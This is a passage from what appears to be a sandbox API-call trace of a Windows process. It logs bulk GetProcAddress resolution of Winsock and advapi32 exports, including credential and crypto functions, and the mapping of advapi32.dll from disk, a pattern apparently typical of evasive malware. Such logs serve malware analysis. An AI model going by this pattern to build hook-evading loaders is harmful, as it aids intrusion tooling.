(hModule=0x77230000, lpProcName="WSCGetApplicationCategory") returned 0x7724df81 [0055.306] GetProcAddress (hModule=0x77230000, lpProcName="WSCGetProviderInfo") returned 0x7724d961 [0055.307] GetProcAddress (hModule=0x77230000, lpProcName="WSCGetProviderPath") returned 0x7723c64e [0055.307] GetProcAddress (hModule=0x77230000, lpProcName="WSCInstallNameSpace") returned 0x772496a9 [0055.307] GetProcAddress (hModule=0x77230000, lpProcName="WSCInstallNameSpaceEx") returned 0x77249859 [0055.307] GetProcAddress (hModule=0x77230000, lpProcName="WSCInstallProvider") returned 0x7724d751 [0055.307] GetProcAddress (hModule=0x77230000, lpProcName="WSCInstallProviderAndChains") returned 0x77248793 [0055.308] GetProcAddress (hModule=0x77230000, lpProcName="WSCSetApplicationCategory") returned 0x7724db99 [0055.308] GetProcAddress (hModule=0x77230000, lpProcName="WSCSetProviderInfo") returned 0x7724d1d1 [0055.308] GetProcAddress (hModule=0x77230000, lpProcName="WSCUnInstallNameSpace") returned 0x77249a11 [0055.308] GetProcAddress (hModule=0x77230000, lpProcName="WSCUpdateProvider") returned 0x7724ce2d [0055.308] GetProcAddress (hModule=0x77230000, lpProcName="WSCWriteNameSpaceOrder") returned 0x77249571 [0055.308] GetProcAddress (hModule=0x77230000, lpProcName="WSCWriteProviderOrder") returned 0x7724d099 [0055.308] GetProcAddress (hModule=0x77230000, lpProcName="WahCloseApcHelper") returned 0x7723aa67 [0055.308] GetProcAddress (hModule=0x77230000, lpProcName="WahCloseHandleHelper") returned 0x7725272d [0055.309] GetProcAddress (hModule=0x77230000, lpProcName="WahCloseNotificationHandleHelper") returned 0x77253261 [0055.309] GetProcAddress (hModule=0x77230000, lpProcName="WahCloseSocketHandle") returned 0x77252772 [0055.309] GetProcAddress (hModule=0x77230000, lpProcName="WahCloseThread") returned 0x772332c4 [0055.309] GetProcAddress (hModule=0x77230000, lpProcName="WahCompleteRequest") returned 0x772527c1 [0055.309] GetProcAddress (hModule=0x77230000, lpProcName="WahCreateHandleContextTable") returned 0x77237e65 [0055.309] GetProcAddress (hModule=0x77230000, lpProcName="WahCreateNotificationHandle") returned 0x7723c3cb [0055.309] GetProcAddress (hModule=0x77230000, lpProcName="WahCreateSocketHandle") returned 0x77253080 [0055.310] GetProcAddress (hModule=0x77230000, lpProcName="WahDestroyHandleContextTable") returned 0x7723f268 [0055.310] GetProcAddress (hModule=0x77230000, lpProcName="WahDisableNonIFSHandleSupport") returned 0x772529fd [0055.310] GetProcAddress (hModule=0x77230000, lpProcName="WahEnableNonIFSHandleSupport") returned 0x7725284f [0055.310] GetProcAddress (hModule=0x77230000, lpProcName="WahEnumerateHandleContexts") returned 0x7723aa97 [0055.310] GetProcAddress (hModule=0x77230000, lpProcName="WahInsertHandleContext") returned 0x7723412b [0055.310] GetProcAddress (hModule=0x77230000, lpProcName="WahNotifyAllProcesses") returned 0x772532c3 [0055.310] GetProcAddress (hModule=0x77230000, lpProcName="WahOpenApcHelper") returned 0x77238483 [0055.310] GetProcAddress (hModule=0x77230000, lpProcName="WahOpenCurrentThread") returned 0x772336a7 [0055.311] GetProcAddress (hModule=0x77230000, lpProcName="WahOpenHandleHelper") returned 0x77252cb2 [0055.311] GetProcAddress (hModule=0x77230000, lpProcName="WahOpenNotificationHandleHelper") returned 0x7723c1fa [0055.311] GetProcAddress (hModule=0x77230000, lpProcName="WahQueueUserApc") returned 0x77252096 [0055.311] GetProcAddress (hModule=0x77230000, lpProcName="WahReferenceContextByHandle") returned 0x77232f20 [0055.311] GetProcAddress (hModule=0x77230000, lpProcName="WahRemoveHandleContext") returned 0x772339b0 [0055.311] GetProcAddress (hModule=0x77230000, lpProcName="WahWaitForNotification") returned 0x7723c2f0 [0055.311] GetProcAddress (hModule=0x77230000, lpProcName="WahWriteLSPEvent") returned 0x77253665 [0055.311] GetProcAddress (hModule=0x77230000, lpProcName="__WSAFDIsSet") returned 0x77236a8a [0055.312] GetProcAddress (hModule=0x77230000, lpProcName="accept") returned 0x772368b6 [0055.312] GetProcAddress (hModule=0x77230000, lpProcName="bind") returned 0x77234582 [0055.312] GetProcAddress (hModule=0x77230000, lpProcName="closesocket") returned 0x77233918 [0055.312] GetProcAddress (hModule=0x77230000, lpProcName="connect") returned 0x77236bdd [0055.312] GetProcAddress (hModule=0x77230000, lpProcName="freeaddrinfo") returned 0x77234b1b [0055.312] GetProcAddress (hModule=0x77230000, lpProcName="getaddrinfo") returned 0x77234296 [0055.312] GetProcAddress (hModule=0x77230000, lpProcName="gethostbyaddr") returned 0x77246c01 [0055.312] GetProcAddress (hModule=0x77230000, lpProcName="gethostbyname") returned 0x77247673 [0055.313] GetProcAddress (hModule=0x77230000, lpProcName="gethostname") returned 0x7723a05b [0055.313] GetProcAddress (hModule=0x77230000, lpProcName="getnameinfo") returned 0x772367b7 [0055.313] GetProcAddress (hModule=0x77230000, lpProcName="getpeername") returned 0x77237147 [0055.313] GetProcAddress (hModule=0x77230000, lpProcName="getprotobyname") returned 0x772468b3 [0055.313] GetProcAddress (hModule=0x77230000, lpProcName="getprotobynumber") returned 0x772467c4 [0055.313] GetProcAddress (hModule=0x77230000, lpProcName="getservbyname") returned 0x77246ef3 [0055.313] GetProcAddress (hModule=0x77230000, lpProcName="getservbyport") returned 0x77246d62 [0055.314] GetProcAddress (hModule=0x77230000, lpProcName="getsockname") returned 0x772330af [0055.314] GetProcAddress (hModule=0x77230000, lpProcName="getsockopt") returned 0x7723737d [0055.314] GetProcAddress (hModule=0x77230000, lpProcName="htonl") returned 0x77232d57 [0055.314] GetProcAddress (hModule=0x77230000, lpProcName="htons") returned 0x77232d8b [0055.314] GetProcAddress (hModule=0x77230000, lpProcName="inet_addr") returned 0x7723311b [0055.314] GetProcAddress (hModule=0x77230000, lpProcName="inet_ntoa") returned 0x7723b131 [0055.314] GetProcAddress (hModule=0x77230000, lpProcName="inet_ntop") returned 0x77243a5a [0055.315] GetProcAddress (hModule=0x77230000, lpProcName="inet_pton") returned 0x77243969 [0055.315] GetProcAddress (hModule=0x77230000, lpProcName="ioctlsocket") returned 0x77233084 [0055.315] GetProcAddress (hModule=0x77230000, lpProcName="listen") returned 0x7723b001 [0055.315] GetProcAddress (hModule=0x77230000, lpProcName="ntohl") returned 0x77232d57 [0055.315] GetProcAddress (hModule=0x77230000, lpProcName="ntohs") returned 0x77232d8b [0055.315] GetProcAddress (hModule=0x77230000, lpProcName="recv") returned 0x77236b0e [0055.315] GetProcAddress (hModule=0x77230000, lpProcName="recvfrom") returned 0x7723b6dc [0055.315] GetProcAddress (hModule=0x77230000, lpProcName="select") returned 0x77236989 [0055.316] GetProcAddress (hModule=0x77230000, lpProcName="send") returned 0x77236f01 [0055.316] GetProcAddress (hModule=0x77230000, lpProcName="sendto") returned 0x772334b5 [0055.316] GetProcAddress (hModule=0x77230000, lpProcName="setsockopt") returned 0x772341b6 [0055.316] GetProcAddress (hModule=0x77230000, lpProcName="shutdown") returned 0x7723449d [0055.316] GetProcAddress (hModule=0x77230000, lpProcName="socket") returned 0x77233eb8 [0055.316] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0055.317] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0055.317] GetModuleFileNameW (in: hModule=0x77710000, lpFilename=0x18efd8, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0055.317] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0055.317] CreateFileW (lpFileName="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0055.317] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0055.317] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0055.318] GetFileSize (in: hFile=0x154, lpFileSizeHigh=0x18efcc | out: lpFileSizeHigh=0x18efcc*=0x0) returned 0x9c600 [0055.318] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0055.318] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x158 [0055.318] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0055.318] MapViewOfFile (hFileMappingObject=0x158, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9c600) returned 0x32e0000 [0055.321] GetProcAddress (hModule=0x77710000, lpProcName="AbortSystemShutdownA") returned 0x7776ddb4 [0055.322] GetProcAddress (hModule=0x77710000, lpProcName="AbortSystemShutdownW") returned 0x7776dd60 [0055.323] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheck") returned 0x7771ca3c [0055.323] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheckAndAuditAlarmA") returned 0x777512f9 [0055.324] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheckAndAuditAlarmW") returned 0x77752ff8 [0055.325] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheckByType") returned 0x7771ae5c [0055.325] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheckByTypeAndAuditAlarmA") returned 0x777513e3 [0055.325] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheckByTypeAndAuditAlarmW") returned 0x77753008 [0055.325] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheckByTypeResultList") returned 0x77753018 [0055.325] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheckByTypeResultListAndAuditAlarmA") returned 0x777514dc [0055.325] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0x777515d5 [0055.326] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0x77753028 [0055.326] GetProcAddress (hModule=0x77710000, lpProcName="AccessCheckByTypeResultListAndAuditAlarmW") returned 0x77753038 [0055.326] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessAllowedAce") returned 0x77724176 [0055.326] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessAllowedAceEx") returned 0x7772465d [0055.326] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessAllowedObjectAce") returned 0x77753048 [0055.327] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessDeniedAce") returned 0x777371e4 [0055.327] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessDeniedAceEx") returned 0x77753058 [0055.327] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessDeniedObjectAce") returned 0x77753068 [0055.328] GetProcAddress (hModule=0x77710000, lpProcName="AddAce") returned 0x7771ae0f [0055.328] GetProcAddress (hModule=0x77710000, lpProcName="AddAuditAccessAce") returned 0x777119a4 [0055.328] GetProcAddress (hModule=0x77710000, lpProcName="AddAuditAccessAceEx") returned 0x77753078 [0055.328] GetProcAddress (hModule=0x77710000, lpProcName="AddAuditAccessObjectAce") returned 0x77753088 [0055.328] GetProcAddress (hModule=0x77710000, lpProcName="AddConditionalAce") returned 0x7777224e [0055.328] GetProcAddress (hModule=0x77710000, lpProcName="AddUsersToEncryptedFile") returned 0x77752a17 [0055.329] GetProcAddress (hModule=0x77710000, lpProcName="AddUsersToEncryptedFileEx") returned 0x77752a5a [0055.329] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenGroups") returned 0x77753098 [0055.329] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0055.329] GetProcAddress (hModule=0x77710000, lpProcName="AllocateAndInitializeSid") returned 0x777240e6 [0055.329] GetProcAddress (hModule=0x77710000, lpProcName="AllocateLocallyUniqueId") returned 0x7771198c [0055.329] GetProcAddress (hModule=0x77710000, lpProcName="AreAllAccessesGranted") returned 0x777530a8 [0055.329] GetProcAddress (hModule=0x77710000, lpProcName="AreAnyAccessesGranted") returned 0x777530b8 [0055.330] GetProcAddress (hModule=0x77710000, lpProcName="AuditComputeEffectivePolicyBySid") returned 0x7771af44 [0055.330] GetProcAddress (hModule=0x77710000, lpProcName="AuditComputeEffectivePolicyByToken") returned 0x77755d41 [0055.330] GetProcAddress (hModule=0x77710000, lpProcName="AuditEnumerateCategories") returned 0x77755e2d [0055.330] GetProcAddress (hModule=0x77710000, lpProcName="AuditEnumeratePerUserPolicy") returned 0x77755cc1 [0055.330] GetProcAddress (hModule=0x77710000, lpProcName="AuditEnumerateSubCategories") returned 0x7771b1d4 [0055.330] GetProcAddress (hModule=0x77710000, lpProcName="AuditFree") returned 0x7771b2ec [0055.330] GetProcAddress (hModule=0x77710000, lpProcName="AuditLookupCategoryGuidFromCategoryId") returned 0x77756163 [0055.330] GetProcAddress (hModule=0x77710000, lpProcName="AuditLookupCategoryIdFromCategoryGuid") returned 0x77756101 [0055.331] GetProcAddress (hModule=0x77710000, lpProcName="AuditLookupCategoryNameA") returned 0x77756031 [0055.331] GetProcAddress (hModule=0x77710000, lpProcName="AuditLookupCategoryNameW") returned 0x77755f31 [0055.331] GetProcAddress (hModule=0x77710000, lpProcName="AuditLookupSubCategoryNameA") returned 0x77756099 [0055.331] GetProcAddress (hModule=0x77710000, lpProcName="AuditLookupSubCategoryNameW") returned 0x777392e2 [0055.331] GetProcAddress (hModule=0x77710000, lpProcName="AuditQueryGlobalSaclA") returned 0x7775650f [0055.331] GetProcAddress (hModule=0x77710000, lpProcName="AuditQueryGlobalSaclW") returned 0x777564c1 [0055.332] GetProcAddress (hModule=0x77710000, lpProcName="AuditQueryPerUserPolicy") returned 0x77755c19 [0055.332] GetProcAddress (hModule=0x77710000, lpProcName="AuditQuerySecurity") returned 0x77756299 [0055.332] GetProcAddress (hModule=0x77710000, lpProcName="AuditQuerySystemPolicy") returned 0x7771aea4 [0055.332] GetProcAddress (hModule=0x77710000, lpProcName="AuditSetGlobalSaclA") returned 0x77756351 [0055.332] GetProcAddress (hModule=0x77710000, lpProcName="AuditSetGlobalSaclW") returned 0x7771b2fc [0055.332] GetProcAddress (hModule=0x77710000, lpProcName="AuditSetPerUserPolicy") returned 0x77755b85 [0055.332] GetProcAddress (hModule=0x77710000, lpProcName="AuditSetSecurity") returned 0x7775619f [0055.332] GetProcAddress (hModule=0x77710000, lpProcName="AuditSetSystemPolicy") returned 0x7771b142 [0055.333] GetProcAddress (hModule=0x77710000, lpProcName="BackupEventLogA") returned 0x77750f5a [0055.334] GetProcAddress (hModule=0x77710000, lpProcName="BackupEventLogW") returned 0x777509ed [0055.334] GetProcAddress (hModule=0x77710000, lpProcName="BuildExplicitAccessWithNameA") returned 0x777123d5 [0055.334] GetProcAddress (hModule=0x77710000, lpProcName="BuildExplicitAccessWithNameW") returned 0x777123d5 [0055.335] GetProcAddress (hModule=0x77710000, lpProcName="BuildImpersonateExplicitAccessWithNameA") returned 0x77761dbd [0055.336] GetProcAddress (hModule=0x77710000, lpProcName="BuildImpersonateExplicitAccessWithNameW") returned 0x77761dbd [0055.336] GetProcAddress (hModule=0x77710000, lpProcName="BuildImpersonateTrusteeA") returned 0x77761f88 [0055.336] GetProcAddress (hModule=0x77710000, lpProcName="BuildImpersonateTrusteeW") returned 0x77761f88 [0055.337] GetProcAddress (hModule=0x77710000, lpProcName="BuildSecurityDescriptorA") returned 0x77761925 [0055.337] GetProcAddress (hModule=0x77710000, lpProcName="BuildSecurityDescriptorW") returned 0x77717345 [0055.337] GetProcAddress (hModule=0x77710000, lpProcName="BuildTrusteeWithNameA") returned 0x77712405 [0055.337] GetProcAddress (hModule=0x77710000, lpProcName="BuildTrusteeWithNameW") returned 0x77712405 [0055.337] GetProcAddress (hModule=0x77710000, lpProcName="BuildTrusteeWithObjectsAndNameA") returned 0x77762044 [0055.337] GetProcAddress (hModule=0x77710000, lpProcName="BuildTrusteeWithObjectsAndNameW") returned 0x77762044 [0055.338] GetProcAddress (hModule=0x77710000, lpProcName="BuildTrusteeWithObjectsAndSidA") returned 0x77761fa5 [0055.338] GetProcAddress (hModule=0x77710000, lpProcName="BuildTrusteeWithObjectsAndSidW") returned 0x77761fa5 [0055.338] GetProcAddress (hModule=0x77710000, lpProcName="BuildTrusteeWithSidA") returned 0x777377e3 [0055.338] GetProcAddress (hModule=0x77710000, lpProcName="BuildTrusteeWithSidW") returned 0x777377e3 [0055.338] GetProcAddress (hModule=0x77710000, lpProcName="CancelOverlappedAccess") returned 0x77763009 [0055.338] GetProcAddress (hModule=0x77710000, lpProcName="ChangeServiceConfig2A") returned 0x777530c8 [0055.338] GetProcAddress (hModule=0x77710000, lpProcName="ChangeServiceConfig2W") returned 0x777530d8 [0055.338] GetProcAddress (hModule=0x77710000, lpProcName="ChangeServiceConfigA") returned 0x777530e8 [0055.339] GetProcAddress (hModule=0x77710000, lpProcName="ChangeServiceConfigW") returned 0x777530f8 [0055.339] GetProcAddress (hModule=0x77710000, lpProcName="CheckTokenMembership") returned 0x7771df04 [0055.339] GetProcAddress (hModule=0x77710000, lpProcName="ClearEventLogA") returned 0x77750ef1 [0055.339] GetProcAddress (hModule=0x77710000, lpProcName="ClearEventLogW") returned 0x777508c1 [0055.340] GetProcAddress (hModule=0x77710000, lpProcName="CloseCodeAuthzLevel") returned 0x77733825 [0055.340] GetProcAddress (hModule=0x77710000, lpProcName="CloseEncryptedFileRaw") returned 0x77752918 [0055.340] GetProcAddress (hModule=0x77710000, lpProcName="CloseEventLog") returned 0x777177c3 [0055.340] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0055.341] GetProcAddress (hModule=0x77710000, lpProcName="CloseThreadWaitChainSession") returned 0x777764c5 [0055.341] GetProcAddress (hModule=0x77710000, lpProcName="CloseTrace") returned 0x77720d39 [0055.341] GetProcAddress (hModule=0x77710000, lpProcName="CommandLineFromMsiDescriptor") returned 0x77739aa5 [0055.341] GetProcAddress (hModule=0x77710000, lpProcName="ComputeAccessTokenFromCodeAuthzLevel") returned 0x77733352 [0055.341] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0055.341] GetProcAddress (hModule=0x77710000, lpProcName="ControlServiceExA") returned 0x77753108 [0055.342] GetProcAddress (hModule=0x77710000, lpProcName="ControlServiceExW") returned 0x77753118 [0055.342] GetProcAddress (hModule=0x77710000, lpProcName="ControlTraceA") returned 0x77768fd4 [0055.342] GetProcAddress (hModule=0x77710000, lpProcName="ControlTraceW") returned 0x7771f65b [0055.342] GetProcAddress (hModule=0x77710000, lpProcName="ConvertAccessToSecurityDescriptorA") returned 0x77763cb1 [0055.342] GetProcAddress (hModule=0x77710000, lpProcName="ConvertAccessToSecurityDescriptorW") returned 0x77762934 [0055.342] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSDToStringSDRootDomainA") returned 0x777725dd [0055.342] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSDToStringSDRootDomainW") returned 0x7777248e [0055.343] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSecurityDescriptorToAccessA") returned 0x77762b61 [0055.343] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSecurityDescriptorToAccessNamedA") returned 0x77762b61 [0055.343] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSecurityDescriptorToAccessNamedW") returned 0x77762b3c [0055.343] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSecurityDescriptorToAccessW") returned 0x77762b3c [0055.343] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSecurityDescriptorToStringSecurityDescriptorA") returned 0x7777276a [0055.343] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSecurityDescriptorToStringSecurityDescriptorW") returned 0x77714241 [0055.344] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSidToStringSidA") returned 0x7774192a [0055.345] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSidToStringSidW") returned 0x77724344 [0055.345] GetProcAddress (hModule=0x77710000, lpProcName="ConvertStringSDToSDDomainA") returned 0x777726c0 [0055.346] GetProcAddress (hModule=0x77710000, lpProcName="ConvertStringSDToSDDomainW") returned 0x777724e6 [0055.346] GetProcAddress (hModule=0x77710000, lpProcName="ConvertStringSDToSDRootDomainA") returned 0x7777255d [0055.346] GetProcAddress (hModule=0x77710000, lpProcName="ConvertStringSDToSDRootDomainW") returned 0x7777243b [0055.347] GetProcAddress (hModule=0x77710000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x7771ca94 [0055.347] GetProcAddress (hModule=0x77710000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x77721f59 [0055.347] GetProcAddress (hModule=0x77710000, lpProcName="ConvertStringSidToSidA") returned 0x77730f23 [0055.347] GetProcAddress (hModule=0x77710000, lpProcName="ConvertStringSidToSidW") returned 0x777309dc [0055.347] GetProcAddress (hModule=0x77710000, lpProcName="ConvertToAutoInheritPrivateObjectSecurity") returned 0x77753128 [0055.347] GetProcAddress (hModule=0x77710000, lpProcName="CopySid") returned 0x7772444e [0055.348] GetProcAddress (hModule=0x77710000, lpProcName="CreateCodeAuthzLevel") returned 0x7775da88 [0055.348] GetProcAddress (hModule=0x77710000, lpProcName="CreatePrivateObjectSecurity") returned 0x77739a12 [0055.348] GetProcAddress (hModule=0x77710000, lpProcName="CreatePrivateObjectSecurityEx") returned 0x7771f489 [0055.348] GetProcAddress (hModule=0x77710000, lpProcName="CreatePrivateObjectSecurityWithMultipleInheritance") returned 0x77753138 [0055.348] GetProcAddress (hModule=0x77710000, lpProcName="CreateProcessAsUserA") returned 0x77752538 [0055.348] GetProcAddress (hModule=0x77710000, lpProcName="CreateProcessAsUserW") returned 0x7771c592 [0055.349] GetProcAddress (hModule=0x77710000, lpProcName="CreateProcessWithLogonW") returned 0x777552e9 [0055.349] GetProcAddress (hModule=0x77710000, lpProcName="CreateProcessWithTokenW") returned 0x7775531f [0055.349] GetProcAddress (hModule=0x77710000, lpProcName="CreateRestrictedToken") returned 0x77753148 [0055.349] GetProcAddress (hModule=0x77710000, lpProcName="CreateServiceA") returned 0x77753158 [0055.349] GetProcAddress (hModule=0x77710000, lpProcName="CreateServiceW") returned 0x7773712c [0055.349] GetProcAddress (hModule=0x77710000, lpProcName="CreateWellKnownSid") returned 0x7772481e [0055.349] GetProcAddress (hModule=0x77710000, lpProcName="CredBackupCredentials") returned 0x77757d1d [0055.350] GetProcAddress (hModule=0x77710000, lpProcName="CredDeleteA") returned 0x77757941 [0055.350] GetProcAddress (hModule=0x77710000, lpProcName="CredDeleteW") returned 0x777579f1 [0055.350] GetProcAddress (hModule=0x77710000, lpProcName="CredEncryptAndMarshalBinaryBlob") returned 0x777581f9 [0055.350] GetProcAddress (hModule=0x77710000, lpProcName="CredEnumerateA") returned 0x77757381 [0055.350] GetProcAddress (hModule=0x77710000, lpProcName="CredEnumerateW") returned 0x77757481 [0055.350] GetProcAddress (hModule=0x77710000, lpProcName="CredFindBestCredentialA") returned 0x77757f49 [0055.350] GetProcAddress (hModule=0x77710000, lpProcName="CredFindBestCredentialW") returned 0x77758029 [0055.351] GetProcAddress (hModule=0x77710000, lpProcName="CredFree") returned 0x7771b2ec [0055.351] GetProcAddress (hModule=0x77710000, lpProcName="CredGetSessionTypes") returned 0x77757c71 [0055.351] GetProcAddress (hModule=0x77710000, lpProcName="CredGetTargetInfoA") returned 0x77757ab3 [0055.351] GetProcAddress (hModule=0x77710000, lpProcName="CredGetTargetInfoW") returned 0x77757b91 [0055.351] GetProcAddress (hModule=0x77710000, lpProcName="CredIsMarshaledCredentialA") returned 0x77758437 [0055.351] GetProcAddress (hModule=0x77710000, lpProcName="CredIsMarshaledCredentialW") returned 0x7773766c [0055.351] GetProcAddress (hModule=0x77710000, lpProcName="CredIsProtectedA") returned 0x77758321 [0055.351] GetProcAddress (hModule=0x77710000, lpProcName="CredIsProtectedW") returned 0x7771c0b8 [0055.352] GetProcAddress (hModule=0x77710000, lpProcName="CredMarshalCredentialA") returned 0x77758383 [0055.352] GetProcAddress (hModule=0x77710000, lpProcName="CredMarshalCredentialW") returned 0x77718dd9 [0055.352] GetProcAddress (hModule=0x77710000, lpProcName="CredProfileLoaded") returned 0x777159e1 [0055.352] GetProcAddress (hModule=0x77710000, lpProcName="CredProfileUnloaded") returned 0x77737015 [0055.352] GetProcAddress (hModule=0x77710000, lpProcName="CredProtectA") returned 0x7775821b [0055.352] GetProcAddress (hModule=0x77710000, lpProcName="CredProtectW") returned 0x77718c20 [0055.352] GetProcAddress (hModule=0x77710000, lpProcName="CredReadA") returned 0x777571c1 [0055.353] GetProcAddress (hModule=0x77710000, lpProcName="CredReadByTokenHandle") returned 0x77758109 [0055.353] GetProcAddress (hModule=0x77710000, lpProcName="CredReadDomainCredentialsA") returned 0x77757741 [0055.353] GetProcAddress (hModule=0x77710000, lpProcName="CredReadDomainCredentialsW") returned 0x77757841 [0055.353] GetProcAddress (hModule=0x77710000, lpProcName="CredReadW") returned 0x777572a1 [0055.353] GetProcAddress (hModule=0x77710000, lpProcName="CredRenameA") returned 0x77757aa1 [0055.353] GetProcAddress (hModule=0x77710000, lpProcName="CredRenameW") returned 0x77757aa1 [0055.353] GetProcAddress (hModule=0x77710000, lpProcName="CredRestoreCredentials") returned 0x77757e39 [0055.353] GetProcAddress (hModule=0x77710000, lpProcName="CredUnmarshalCredentialA") returned 0x777583ce [0055.353] GetProcAddress (hModule=0x77710000, lpProcName="CredUnmarshalCredentialW") returned 0x7771c057 [0055.354] GetProcAddress (hModule=0x77710000, lpProcName="CredUnprotectA") returned 0x77758465 [0055.354] GetProcAddress (hModule=0x77710000, lpProcName="CredUnprotectW") returned 0x777180de [0055.354] GetProcAddress (hModule=0x77710000, lpProcName="CredWriteA") returned 0x77757051 [0055.354] GetProcAddress (hModule=0x77710000, lpProcName="CredWriteDomainCredentialsA") returned 0x77757581 [0055.354] GetProcAddress (hModule=0x77710000, lpProcName="CredWriteDomainCredentialsW") returned 0x77757661 [0055.354] GetProcAddress (hModule=0x77710000, lpProcName="CredWriteW") returned 0x77757109 [0055.354] GetProcAddress (hModule=0x77710000, lpProcName="CredpConvertCredential") returned 0x77756b8a [0055.354] GetProcAddress (hModule=0x77710000, lpProcName="CredpConvertOneCredentialSize") returned 0x77756a44 [0055.354] GetProcAddress (hModule=0x77710000, lpProcName="CredpConvertTargetInfo") returned 0x77756c41 [0055.355] GetProcAddress (hModule=0x77710000, lpProcName="CredpDecodeCredential") returned 0x777565fa [0055.355] GetProcAddress (hModule=0x77710000, lpProcName="CredpEncodeCredential") returned 0x77756599 [0055.355] GetProcAddress (hModule=0x77710000, lpProcName="CredpEncodeSecret") returned 0x77757cf9 [0055.355] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextA") returned 0x777191dd [0055.355] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0055.355] GetProcAddress (hModule=0x77710000, lpProcName="CryptContextAddRef") returned 0x77753168 [0055.355] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0055.355] GetProcAddress (hModule=0x77710000, lpProcName="CryptDecrypt") returned 0x77753178 [0055.355] GetProcAddress (hModule=0x77710000, lpProcName="CryptDeriveKey") returned 0x77753188 [0055.356] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0055.356] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyKey") returned 0x7771c51a [0055.356] GetProcAddress (hModule=0x77710000, lpProcName="CryptDuplicateHash") returned 0x77753198 [0055.356] GetProcAddress (hModule=0x77710000, lpProcName="CryptDuplicateKey") returned 0x777531a8 [0055.356] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0055.356] GetProcAddress (hModule=0x77710000, lpProcName="CryptEnumProviderTypesA") returned 0x777531b8 [0055.356] GetProcAddress (hModule=0x77710000, lpProcName="CryptEnumProviderTypesW") returned 0x777531c8 [0055.356] GetProcAddress (hModule=0x77710000, lpProcName="CryptEnumProvidersA") returned 0x777531d8 [0055.357] GetProcAddress (hModule=0x77710000, lpProcName="CryptEnumProvidersW") returned 0x777531e8 [0055.357] GetProcAddress (hModule=0x77710000, lpProcName="CryptExportKey") returned 0x777191ea [0055.357] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenKey") returned 0x77718ee9 [0055.357] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0055.357] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetDefaultProviderA") returned 0x777531f8 [0055.357] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetDefaultProviderW") returned 0x77753208 [0055.357] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0055.357] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0055.358] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetProvParam") returned 0x77753218 [0055.358] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetUserKey") returned 0x77753228 [0055.358] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0055.358] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashSessionKey") returned 0x77753238 [0055.358] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0055.358] GetProcAddress (hModule=0x77710000, 